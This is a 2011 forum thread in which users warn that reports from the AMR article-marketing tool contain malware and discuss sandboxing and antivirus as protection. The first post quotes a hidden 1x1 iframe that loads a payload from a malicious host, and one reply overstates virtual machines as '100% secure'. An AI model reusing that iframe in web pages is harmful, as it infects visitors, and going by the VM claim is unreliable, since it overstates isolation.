1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

AMR & Viruses

Discussion in 'BlackHat Lounge' started by the_demon, Jun 14, 2011.

  1. the_demon

    the_demon Jr. Executive VIP

    Joined:
    Nov 23, 2008
    Messages:
    3,177
    Likes Received:
    1,563
    Occupation:
    Search Engine Marketing
    Location:
    The Internet
    Ok, so I just so happened to be doing a routine check of my computer with Webroot Spysweeper and when reviewing the list of suspicious items I noticed something strange...

    In one of my AMR reports there was an iFrame virus/malware. I didn't think AMR was a shady tool so I was a little bit confused at first... Upon further investigation I checked out one of the html file reports. Sure enough in the header was a iframe:

    WARNING THIS LINKS TO MALWARE -- DO NOT GO HERE
    Code:
    <iframe src="http://vizedozey73.co.cc/7box/awhwhwhvhujqdpko6.php?n=setup157" width="1" height="1" frameborder="0"></iframe>
    WARNING THIS LINKS TO MALWARE -- DO NOT GO HERE

    Apparently the site ArticleWay.com is infected. So if you have this site in your AMR I would suggest taking it out or at a minimum not checking that particular report as you may become infected.

    THE LESSON LEARNED:
    --> Scan your article directory list before using them. I would recommend the AddOn in ScrapeBox which checks Google Safe Browsing database. This will allow you to check your list very quickly.

    --> Be careful when checking your reports!
     
    Last edited: Jun 14, 2011
  2. aReJay

    aReJay Power Member

    Joined:
    Apr 29, 2009
    Messages:
    736
    Likes Received:
    237
    Location:
    Down under
    There are a number of article directories infected, hence why it is suggested to install on a virtual machine.

    -aReJay
     
  3. the_demon

    the_demon Jr. Executive VIP

    Joined:
    Nov 23, 2008
    Messages:
    3,177
    Likes Received:
    1,563
    Occupation:
    Search Engine Marketing
    Location:
    The Internet
    @aReJay: Great point though, I believe some very new viruses can break out of virtual boxes.

    I suppose another method of prevention would be to host AMR on a VPS.
     
  4. hatcheck

    hatcheck Junior Member

    Joined:
    May 23, 2011
    Messages:
    114
    Likes Received:
    22
    Vince of AMR will probably see your post and remove the article from the directory.

    Also, I think you're better off with a mainstream anti-virus program that catches more stuff before it hits your hard drive. So far, all of the malware I've run into using AMR have been caught by my AV firewall, which is Norton.
     
  5. Sniper

    Sniper Jr. VIP Jr. VIP Premium Member

    Joined:
    Dec 30, 2008
    Messages:
    471
    Likes Received:
    213
    Location:
    Torrent Assault
    Home Page:
    Is that articleway or articleways? I only see the latter - or better yet, what is the site ID. I watch for threads like these and disable the sites when they come up.
     
  6. Subsonic

    Subsonic Regular Member

    Joined:
    Mar 17, 2011
    Messages:
    367
    Likes Received:
    333
    Location:
    DNS root zone database
    I've been working with virtual machines for a long time and it's perfectly safe for testing infected software if the user knows what he/she is doing. Virtual Machines are basically 100% secure and sandboxed from the host PC if you are not using shared folders and if you are not in the same network with the host PC. The emulation means that all the software running on that virtual OS doesn't even know that it's virtual, thus they have no connection to the host and are not able to infect it.

    There are lots of misconceptions about virtual PC's so it's always good to read some basics about them if you are using them :) I hope that this helps someone!